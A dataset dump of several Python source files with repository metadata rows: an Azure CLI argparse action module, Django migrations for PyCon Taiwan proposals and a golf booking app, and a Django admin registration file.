from .augmentation import * | 26 | 32 | 0.784615 | 18 | 130 | 5.555556 | 0.5 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036036 | 0.146154 | 130 | 5 | 33 | 26 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
31aa6ac57e77f8021d0f0e53902b0489b424026f | 6,505 | py | Python | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/monitor-control-service/azext_amcs/manual/action.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from collections import defaultdict
from azure.cli.core.azclierror import ValidationError
class AddDataFlows(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddDataFlows, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'streams':
d['streams'] = v
elif kl == 'destinations':
d['destinations'] = v
return d
class AddDestinationsLogAnalytics(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddDestinationsLogAnalytics, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'resource-id':
d['workspace_resource_id'] = v[0]
elif kl == 'name':
d['name'] = v[0]
return d
class AddDestinationsAzureMonitorMetrics(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.destinations_azure_monitor_metrics = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'name':
d['name'] = v[0]
return d
class AddDataSourcesPerformanceCounters(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddDataSourcesPerformanceCounters, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'streams':
d['streams'] = v
elif kl == 'sampling-frequency':
try:
d['sampling_frequency_in_seconds'] = int(v[0])
except ValueError:
raise ValidationError('invalid sampling-frequency={}'.format(v[0]))
elif kl == 'counter-specifiers':
d['counter_specifiers'] = v
elif kl == 'name':
d['name'] = v[0]
return d
class AddDataSourcesWindowsEventLogs(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddDataSourcesWindowsEventLogs, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'streams':
d['streams'] = v
elif kl == 'x-path-queries':
d['x_path_queries'] = v
elif kl == 'name':
d['name'] = v[0]
return d
class AddDataSourcesSyslog(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddDataSourcesSyslog, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise ValidationError('{} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'streams':
d['streams'] = v
elif kl == 'facility-names':
d['facility_names'] = v
elif kl == 'log-levels':
d['log_levels'] = v
elif kl == 'name':
d['name'] = v[0]
return d
| 39.186747 | 105 | 0.554035 | 681 | 6,505 | 5.140969 | 0.14978 | 0.0994 | 0.092545 | 0.071979 | 0.741217 | 0.741217 | 0.741217 | 0.741217 | 0.741217 | 0.734647 | 0 | 0.003313 | 0.30392 | 6,505 | 165 | 106 | 39.424242 | 0.769876 | 0.08455 | 0 | 0.778571 | 0 | 0 | 0.076405 | 0.011949 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.021429 | 0 | 0.192857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
31e868189cd5c6e0402b5c20f980cee9a7de70cf | 1,573 | py | Python | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 47 | 2015-12-19T10:23:11.000Z | 2018-06-13T08:07:33.000Z | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 473 | 2018-12-01T13:01:48.000Z | 2022-03-30T07:10:42.000Z | src/proposals/migrations/0048_auto_20210130_2309.py | kaka-lin/pycon.tw | 67809a5e43b03273ac8d8f5a1b6b3d3f73474be7 | [
"MIT"
] | 91 | 2018-07-26T02:38:59.000Z | 2022-01-16T02:38:31.000Z | # Generated by Django 3.0.7 on 2021-01-30 15:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('proposals', '0047_auto_20200630_2342'),
]
operations = [
migrations.AlterField(
model_name='additionalspeaker',
name='conference',
field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
),
migrations.AlterField(
model_name='talkproposal',
name='conference',
field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
),
migrations.AlterField(
model_name='tutorialproposal',
name='conference',
field=models.SlugField(choices=[('pycontw-2016', 'PyCon Taiwan 2016'), ('pycontw-2017', 'PyCon Taiwan 2017'), ('pycontw-2018', 'PyCon Taiwan 2018'), ('pycontw-2019', 'PyCon Taiwan 2019'), ('pycontw-2020', 'PyCon Taiwan 2020'), ('pycontw-2021', 'PyCon Taiwan 2021')], default='pycontw-2021', verbose_name='conference'),
),
]
| 54.241379 | 330 | 0.636364 | 170 | 1,573 | 5.835294 | 0.270588 | 0.199597 | 0.075605 | 0.087702 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0.772177 | 0 | 0.146897 | 0.190718 | 1,573 | 28 | 331 | 56.178571 | 0.632364 | 0.028608 | 0 | 0.545455 | 1 | 0 | 0.455439 | 0.015072 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
734d4ba54a9e6c40b30db5d211e60f625ac9e686 | 227 | py | Python | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | profiles_api/admin.py | Gunaksh-Joshi/profiles-rest-api | 9014651aad520f9c165baef321d8f2bba4e2a28a | [
"MIT"
] | null | null | null | from django.contrib import admin
"""import models from models"""
from profiles_api import models
"""Register models which we have created"""
admin.site.register(models.UserProfile)
admin.site.register(models.ProfileFeedItem)
| 25.222222 | 43 | 0.801762 | 30 | 227 | 6.033333 | 0.533333 | 0.232044 | 0.187845 | 0.254144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096916 | 227 | 8 | 44 | 28.375 | 0.882927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c340d1d594a5cfb06c6c1a78a88d01360de1c513 | 23,706 | py | Python | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | null | null | null | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | 3 | 2021-03-30T12:56:11.000Z | 2021-09-22T18:47:42.000Z | booking/migrations/0001_initial.py | pincoin/withthai-old | 10e6248f14faba4c4ce3e387e93e28dabb76a2f7 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-18 15:20
import booking.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import easy_thumbnails.fields
import model_utils.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='Area english name')),
('title_thai', models.CharField(max_length=255, verbose_name='Area Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='Area Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
migrations.CreateModel(
name='Asset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('code', models.IntegerField(choices=[(0, 'GB prime pay'), (1, 'Petty cash'), (2, 'Passbook Krungsri'), (3, 'Passbook Kasikorn')], db_index=True, default=0, verbose_name='Asset code')),
('title', models.CharField(max_length=255, verbose_name='Asset name')),
('balance', models.DecimalField(decimal_places=0, max_digits=11, verbose_name='Asset balance')),
],
options={
'verbose_name': 'Asset',
'verbose_name_plural': 'Assets',
},
),
migrations.CreateModel(
name='Club',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(db_index=True, max_length=255, verbose_name='Golf club English name')),
('title_thai', models.CharField(db_index=True, max_length=255, verbose_name='Golf club Thai name')),
('title_korean', models.CharField(db_index=True, max_length=255, verbose_name='Golf club Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('phone', models.CharField(blank=True, max_length=32, null=True, verbose_name='Phone number')),
('email', models.EmailField(blank=True, max_length=255, null=True, verbose_name='Email address')),
('fax', models.CharField(blank=True, max_length=16, null=True, verbose_name='Fax number')),
('website', models.URLField(blank=True, max_length=255, null=True, verbose_name='Website')),
('address', models.CharField(blank=True, max_length=255, null=True, verbose_name='Golf club address')),
('hole', models.IntegerField(choices=[(0, '18 Holes'), (1, '9 Holes'), (2, '27 Holes'), (3, '36 Holes')], db_index=True, default=0, verbose_name='No. of holes')),
('country', models.IntegerField(choices=[(1, 'Thailand'), (2, 'South Korea'), (3, 'Japan'), (4, 'China')], db_index=True, default=1, verbose_name='Country code')),
('green_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Start from')),
('caddie_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee')),
('cart_fee_selling_price', models.DecimalField(db_index=True, decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee')),
('max_pax', models.IntegerField(default=4, verbose_name='Max PAX')),
('cart_required', models.IntegerField(db_index=True, default=0, verbose_name='Require golf cart')),
('weekdays_min_in_advance', models.IntegerField(db_index=True, default=1, verbose_name='Weekdays minimum in advance')),
('weekdays_max_in_advance', models.IntegerField(db_index=True, default=30, verbose_name='Weekdays maximum in advance')),
('weekend_min_in_advance', models.IntegerField(db_index=True, default=1, verbose_name='Weekend minimum in advance')),
('weekend_max_in_advance', models.IntegerField(db_index=True, default=7, verbose_name='Weekend maximum in advance')),
('thumbnail1', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 1')),
('thumbnail2', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 2')),
('thumbnail3', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 3')),
('thumbnail4', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 4')),
('thumbnail5', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 5')),
('latitude', models.DecimalField(decimal_places=6, default=0, max_digits=9, verbose_name='Latitude')),
('longitude', models.DecimalField(decimal_places=6, default=0, max_digits=9, verbose_name='Longitude')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('status', models.IntegerField(choices=[(0, 'Club open'), (1, 'Club closed')], db_index=True, default=0, verbose_name='Club status')),
],
options={
'verbose_name': 'Golf club',
'verbose_name_plural': 'Golf clubs',
},
),
migrations.CreateModel(
name='ClubList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Club list title')),
('code', models.CharField(max_length=255, verbose_name='Club list code')),
],
options={
'verbose_name': 'Golf club list',
'verbose_name_plural': 'Golf club lists',
},
),
migrations.CreateModel(
name='ClubOrderListMembership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('round_date', models.DateField(db_index=True, verbose_name='Round date')),
('round_time', models.TimeField(db_index=True, verbose_name='Round time')),
('pax', models.IntegerField(default=4, verbose_name='PAX')),
('green_fee_selling_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
],
options={
'verbose_name': 'Golf club order list membership',
'verbose_name_plural': 'Golf club order list membership',
},
),
migrations.CreateModel(
name='Rate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('season_start', models.DateField(verbose_name='Season start date')),
('season_end', models.DateField(verbose_name='Season end date')),
('day_of_week', models.IntegerField(choices=[(0, 'Weekday'), (1, 'Weekend')], db_index=True, default=0, verbose_name='Day of week')),
('slot_start', models.TimeField(verbose_name='Slot start time')),
('slot_end', models.TimeField(verbose_name='Slot end time')),
('title', models.IntegerField(choices=[(0, 'Day golf'), (1, 'Day golf 1st round'), (2, 'Day golf 2nd round'), (3, 'Twilight golf'), (4, 'Night golf')], db_index=True, default=0, verbose_name='Rate title')),
('green_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('caddie_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee selling price')),
('caddie_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee cost price')),
('cart_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee selling price')),
('cart_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
],
options={
'verbose_name': 'Service rate',
'verbose_name_plural': 'Service rates',
},
),
migrations.CreateModel(
name='Province',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='Province English name')),
('title_thai', models.CharField(max_length=255, verbose_name='Province Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='Province Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Area', verbose_name='Location area')),
],
options={
'verbose_name': 'Province',
'verbose_name_plural': 'Provinces',
},
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('is_removed', models.BooleanField(default=False)),
('order_no', models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='Booking no')),
('last_name', models.CharField(blank=True, max_length=64, verbose_name='Last name')),
('first_name', models.CharField(blank=True, max_length=64, verbose_name='First name')),
('user_agent', models.TextField(blank=True, verbose_name='User-agent')),
('accept_language', models.TextField(blank=True, verbose_name='Accept-language')),
('ip_address', models.GenericIPAddressField(verbose_name='IP address')),
('transaction_id', models.CharField(blank=True, max_length=64, verbose_name='Transaction ID')),
('status', models.IntegerField(choices=[(0, 'Booking opened'), (1, 'Booking pending'), (2, 'Booking offered'), (3, 'Payment completed'), (4, 'Booking confirmed'), (5, 'Booking unavailable'), (6, 'Payment adjustment'), (7, 'Payment adjusted'), (8, 'Refund requested'), (9, 'Refund pending'), (10, 'Refunded'), (11, 'Refunded'), (12, 'Voided')], db_index=True, default=0, verbose_name='Booking status')),
('total_selling_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total selling price')),
('total_cost_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total cost price')),
('message', models.TextField(blank=True, verbose_name='Booking message')),
('clubs', models.ManyToManyField(through='booking.ClubOrderListMembership', to='booking.Club')),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Parent order')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Booking order',
'verbose_name_plural': 'Booking orders',
},
),
migrations.CreateModel(
name='Holiday',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Holiday name')),
('holiday', models.DateField(db_index=True, verbose_name='Holiday day')),
('country', models.IntegerField(choices=[(1, 'Thailand'), (2, 'South Korea'), (3, 'Japan'), (4, 'China')], db_index=True, default=1, verbose_name='Country code')),
],
options={
'verbose_name': 'Holiday',
'verbose_name_plural': 'Holidays',
'unique_together': {('holiday', 'country')},
},
),
migrations.CreateModel(
name='District',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='District English name')),
('title_thai', models.CharField(max_length=255, verbose_name='District Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='District Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('province', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Province', verbose_name='Province')),
],
options={
'verbose_name': 'District',
'verbose_name_plural': 'Districts',
},
),
migrations.AddField(
model_name='cluborderlistmembership',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order'),
),
migrations.CreateModel(
name='ClubOrderChangeLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('status', models.IntegerField(choices=[(0, 'Booking opened'), (1, 'Booking pending'), (2, 'Booking offered'), (3, 'Payment completed'), (4, 'Booking confirmed'), (5, 'Booking unavailable'), (6, 'Payment adjustment'), (7, 'Payment adjusted'), (8, 'Refund requested'), (9, 'Refund pending'), (10, 'Refunded'), (11, 'Refunded'), (12, 'Voided')], db_index=True, default=0, verbose_name='Booking status')),
('total_selling_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total selling price')),
('total_cost_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total cost price')),
('round_date', models.DateField(db_index=True, verbose_name='Round date')),
('round_time', models.TimeField(db_index=True, verbose_name='Round time')),
('pax', models.IntegerField(default=4, verbose_name='PAX')),
('green_fee_selling_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Golf club order changelog',
'verbose_name_plural': 'Golf club order changelog',
},
),
migrations.CreateModel(
name='ClubListMembership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.IntegerField(verbose_name='Position')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
('club_list', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.ClubList', verbose_name='Golf club list')),
],
options={
'verbose_name': 'Golf club list membership',
'verbose_name_plural': 'Golf club list membership',
},
),
migrations.AddField(
model_name='clublist',
name='clubs',
field=models.ManyToManyField(through='booking.ClubListMembership', to='booking.Club'),
),
migrations.AddField(
model_name='club',
name='district',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.District', verbose_name='District'),
),
migrations.CreateModel(
name='AssetTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('category', models.IntegerField(choices=[(0, 'Payment'), (1, 'Refund'), (2, 'Purchase'), (3, 'Purchase cancel'), (4, 'Transfer payment'), (5, 'Gains'), (6, 'Expense')], db_index=True, default=0, verbose_name='Transaction category')),
('amount', models.DecimalField(decimal_places=0, max_digits=11, verbose_name='Amount')),
('transaction_date', models.DateTimeField(verbose_name='Transaction date')),
('remarks', models.TextField(blank=True, verbose_name='Remarks')),
('asset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Asset', verbose_name='Asset')),
('order', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order')),
],
options={
'verbose_name': 'Asset transaction',
'verbose_name_plural': 'Asset transactions',
},
),
]
| 79.284281 | 418 | 0.640344 | 2,629 | 23,706 | 5.586154 | 0.100799 | 0.126583 | 0.038132 | 0.038949 | 0.778292 | 0.761337 | 0.733964 | 0.711153 | 0.7038 | 0.679014 | 0 | 0.014602 | 0.214207 | 23,706 | 298 | 419 | 79.550336 | 0.773781 | 0.001898 | 0 | 0.474227 | 1 | 0 | 0.218817 | 0.016822 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.003436 | 0.027491 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c374c310870b3676411eeeeeb618096b62ec168e | 247 | py | Python | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
] | 58 | 2018-08-17T14:26:02.000Z | 2022-03-28T05:42:03.000Z | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
] | 52 | 2018-08-23T01:33:04.000Z | 2022-03-28T15:54:13.000Z | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
